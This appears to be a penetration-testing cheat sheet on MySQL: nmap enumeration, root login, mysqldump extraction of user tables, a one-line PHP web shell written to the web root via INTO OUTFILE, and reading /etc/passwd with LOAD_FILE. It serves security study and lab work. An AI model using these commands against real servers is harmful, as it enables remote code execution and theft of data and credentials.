### Footprinting scanning MySQL server ```bash sudo nmap <IP> -sV -sC -p 3306 --script mysql* ``` interaction with the MySQL server ```bash mysql -u root -h <IP> mysql -u root -p<password> -h <IP> # no whitespace between -p and password # ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain mysql -u root -p<password> -h <IP> --skip-ssl mysql -h $machine2 -u root -p --ssl-mode=DISABLED # 또는 (구버전 클라이언트) mysql -h $machine2 -u root -p --ssl=0 ``` ### DB Dump ```bash # 데이터베이스 전체 덤프 mysqldump -u <유저이름> -p'<비밀번호>' -P <포트> -h <ip> <데이터베이스> # 테이블 덤프 mysqldump -u <유저이름> -p'<비밀번호>' -P <포트> -h <ip> <데이터베이스> <테이블이름> # 특정 레코드 덤프 - 예) username 열에 admin 문자열이 들어간 레코드만 덤프 mysqldump -u <유저이름> -p'<비밀번호>' -P <포트> -h <ip> <데이터베이스> <테이블이름> --where="username LIKE '%admin%'" # 예시 - production 데이터베이스에 users 테이블 모두 덤프 mysqldump -u root -p'root' -h 172.31.244.116 -P 33060 production users > user.sql.dump # 예시 - production 데이터베이스의 users 테이블에 username 열 중에서 davis 라는 문자열이 포함된 레코드만 덤프 mysqldump -u root -p'root' -h 172.31.244.116 -P 33060 production users --where="username LIKE '%davis%' " > davis.dump ``` # Commands | **Command** | **Description** | | ---------------------------------------------------- | ----------------------------------------------------------------------------------------------------- | | `mysql -u <user> -p<password> -h <IP address>` | Connect to the MySQL server. There should **not** be a space between the '-p' flag, and the password. | | `show databases;` | Show all databases. | | `use <database>;` | Select one of the existing databases. | | `show tables;` | Show all available tables in the selected database. | | `show columns from <table>;` | Show all columns in the selected table. | | `select * from <table>;` | Show everything in the desired table. | | `select * from <table> where <column> = "<string>";` | Search for needed `string` in the desired table. | ### Write Local Files MySQL does not have a stored procedure like `xp_cmdshell` but we can achieve command execution if we write to a location in the file system that we can execute our commands. In MySQL, a global system variable `secure_file_priv` limits the effect of data import and export and the `LOAD DATA` and `SELECT ... INTO OUTFILE` statements and the `LOAD_FILE()` function. These operations are permitted by only to users who have the `FILE` privilege. ```sql SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; ``` ### `secure_file_priv` - If empty, the variable has no effect, which is not a secure setting. - If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it. - If set to NULL, the server disables import and export operations. In the example below, we can see the variable is empty, which means we can read and write data using MySQL ```bash mysql> show variables like "secure_file_priv"; +------------------+-------+ | Variable_name | Value | +------------------+-------+ | secure_file_priv | | +------------------+-------+ ``` ### Read Local Files by default a MySQL installation does not allow arbitrary file read, but if the correct settings are in place and with the appropriate privileges, we can read files using the following methods ```sql mysql> select LOAD_FILE("/etc/passwd"); ```